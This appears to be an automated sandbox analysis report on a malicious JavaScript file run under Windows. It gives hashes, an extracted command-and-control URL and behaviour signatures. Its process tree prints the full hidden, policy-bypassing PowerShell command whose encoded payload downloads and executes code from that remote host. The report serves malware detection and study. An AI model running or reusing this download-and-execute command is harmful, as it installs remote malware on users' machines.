Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
02/01/2024, 15:55
Static task
static1
Behavioral task
behavioral1
Sample
359b12112992fb525b91de4c27d24bff.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
359b12112992fb525b91de4c27d24bff.js
Resource
win10v2004-20231215-en
General
-
Target
359b12112992fb525b91de4c27d24bff.js
-
Size
23KB
-
MD5
359b12112992fb525b91de4c27d24bff
-
SHA1
5de67e028c5d9e43d4219a51815d7e73298ce26c
-
SHA256
88d4d3f48bd23543980b70b5a78606d80c2917bfcd960991eb9a8ddf6ac58ed2
-
SHA512
38fe4134cdd2bd4b356919789a2f0090dcd0588f4d12f1cd4f9a2ec43ec6e18b907e1751fb3a59ba34fe261c39e40ab5ecf955ef4743b6fce0576800ddce845d
-
SSDEEP
384:+YjCpsGBoQjAyo1a5mc4+Ph9wMnRBdGybNTsFO02St:+1pqQjAz1a54+pyOTsFO02St
Malware Config
Extracted
http://munardis.space/222g100/index.php
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2292 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1636 wrote to memory of 2940 1636 wscript.exe 28 PID 1636 wrote to memory of 2940 1636 wscript.exe 28 PID 1636 wrote to memory of 2940 1636 wscript.exe 28 PID 2940 wrote to memory of 2292 2940 cmd.exe 30 PID 2940 wrote to memory of 2292 2940 cmd.exe 30 PID 2940 wrote to memory of 2292 2940 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\359b12112992fb525b91de4c27d24bff.js1⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-